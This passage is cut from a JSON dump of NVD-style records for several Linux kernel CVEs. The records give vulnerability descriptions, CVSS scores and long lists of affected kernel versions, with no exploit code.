"AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9150"], "modified": "2017-09-09T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.10.9"], "id": "CVE-2017-9150", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9150", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.10.9:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:34:54", "description": "The replace_map_fd_with_map_ptr function in kernel/bpf/verifier.c in the Linux kernel before 4.5.5 does not properly maintain an fd data structure, which allows local users to gain privileges or cause a denial of service (use-after-free) via crafted BPF instructions that reference an incorrect file descriptor.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-23T10:59:00", "type": "cve", "title": "CVE-2016-4557", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4557"], "modified": "2023-01-17T21:40:00", "cpe": [], "id": "CVE-2016-4557", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4557", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-06T14:36:00", "description": "Use-after-free vulnerability in net/unix/af_unix.c in the Linux kernel before 4.3.3 allows local users to bypass intended AF_UNIX socket permissions or cause a denial of service (panic) via crafted epoll_ctl calls.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2015-12-28T11:59:00", "type": "cve", "title": "CVE-2013-7446", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 5.4, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7446"], "modified": "2018-08-13T21:47:00", "cpe": ["cpe:/o:linux:linux_kernel:4.3.2"], "id": "CVE-2013-7446", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7446", "cvss": {"score": 5.4, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.3.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T01:25:52", "description": "The WLAN (aka Wi-Fi) driver for the Linux kernel 3.x and 4.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, does not verify authorization for private SET IOCTL calls, which allows attackers to gain privileges via a crafted application, related to wlan_hdd_hostapd.c and wlan_hdd_wext.c.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-05-09T10:59:00", "type": "cve", "title": "CVE-2015-0571", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0571"], "modified": "2020-07-31T18:56:00", "cpe": ["cpe:/o:linux:linux_kernel:4.20.15", "cpe:/o:linux:linux_kernel:3.18.66"], "id": "CVE-2015-0571", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0571", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.66:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.20.15:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T10:24:22", "description": "Stack consumption vulnerability in the parse_rock_ridge_inode_internal function in fs/isofs/rock.c in the Linux kernel through 3.16.1 allows local users to cause a denial of service (uncontrolled recursion, and system crash or reboot) via a crafted iso9660 image with a CL entry referring to a directory entry that has a CL entry.", "cvss3": {}, "published": "2014-09-01T01:55:00", "type": "cve", "title": "CVE-2014-5471", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:L/AC:H/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5471"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:3.16.1", "cpe:/o:linux:linux_kernel:3.16.0"], "id": "CVE-2014-5471", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5471", "cvss": {"score": 4.0, "vector": "AV:L/AC:H/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.16.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:35:26", "description": "The Linux kernel before 3.12.4 updates certain length values before ensuring that associated data structures have been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call, related to net/ipv4/ping.c, net/ipv4/raw.c, net/ipv4/udp.c, net/ipv6/raw.c, and net/ipv6/udp.c.", "cvss3": {}, "published": "2014-01-06T16:55:00", "type": "cve", "title": "CVE-2013-7263", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7263"], "modified": "2017-12-16T02:29:00", "cpe": ["cpe:/o:linux:linux_kernel:3.11.4", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.0.60", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.8.11", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.48", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.12.1", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.10.8", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.8.2", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.9.7", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.51", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.8.1", "cpe:/o:linux:linux_kernel:3.10.21", "cpe:/o:linux:linux_kernel:3.0.64", "cpe:/o:linux:linux_kernel:3.0.47", "cpe:/o:linux:linux_kernel:3.9.5", "cpe:/o:linux:linux_kernel:3.10.6", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.10.15", "cpe:/o:linux:linux_kernel:3.0.57", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.7.10", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.11", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.10.17", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.4.11", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.11.7", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.0.49", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.4.26", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.0.63", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.12.3", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.10.18", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.10.3", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.9.6", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.0.45", "cpe:/o:linux:linux_kernel:3.9", "cpe:/o:linux:linux_kernel:3.10.23", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.8.5", "cpe:/o:linux:linux_kernel:3.0.52", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.4.29", "cpe:/o:linux:linux_kernel:3.0.68", "cpe:/o:linux:linux_kernel:3.0.62", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.9.4", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.0.59", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.12.2", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.11.9", "cpe:/o:linux:linux_kernel:3.6", "cpe:/o:linux:linux_kernel:3.6.5", "cpe:/o:linux:linux_kernel:3.0.46", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.11.5", "cpe:/o:linux:linux_kernel:3.10.12", "cpe:/o:linux:linux_kernel:3.10.9", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.6.4", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.4.27", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.0.53", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.8.3", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.9.9", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.4.25", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.9.10", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.6.7", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.0.55", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.8.9", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.10.7", "cpe:/o:linux:linux_kernel:3.6.1", "cpe:/o:linux:linux_kernel:3.9.3", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.11.3", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.11.1", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.8.0", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.6.6", "cpe:/o:linux:linux_kernel:3.6.3", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.0.65", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.10.16", "cpe:/o:linux:linux_kernel:3.0.58", "cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.4.28", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.6.2", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.8.13", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.8.12", "cpe:/o:linux:linux_kernel:3.0.50", "cpe:/o:linux:linux_kernel:3.9.2", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.10.19", "cpe:/o:linux:linux_kernel:3.10.13", "cpe:/o:linux:linux_kernel:3.9.0", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.9.8", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.31", "cpe:/o:linux:linux_kernel:3.8.7", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.6.8", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.11.8", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.11.6", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.4.32", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.10.4", "cpe:/o:linux:linux_kernel:3.0.66", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.9.1", "cpe:/o:linux:linux_kernel:3.0.54", "cpe:/o:linux:linux_kernel:3.10.20", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.11.10", "cpe:/o:linux:linux_kernel:3.0.61", "cpe:/o:linux:linux_kernel:3.11.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.9.11", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.8.8", "cpe:/o:linux:linux_kernel:3.0.56", "cpe:/o:linux:linux_kernel:3.12", "cpe:/o:linux:linux_kernel:3.8.10", "cpe:/o:linux:linux_kernel:3.10.1", "cpe:/o:linux:linux_kernel:3.0.67", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.10.10", "cpe:/o:linux:linux_kernel:3.8.4", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.8.6", "cpe:/o:linux:linux_kernel:3.10.22", "cpe:/o:linux:linux_kernel:3.10.14", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.4.30", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.10.11", "cpe:/o:linux:linux_kernel:3.10.5", "cpe:/o:linux:linux_kernel:3.10.2"], "id": "CVE-2013-7263", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7263", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.45:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.51:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.49:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.55:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.56:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.47:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.48:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.54:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.59:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", 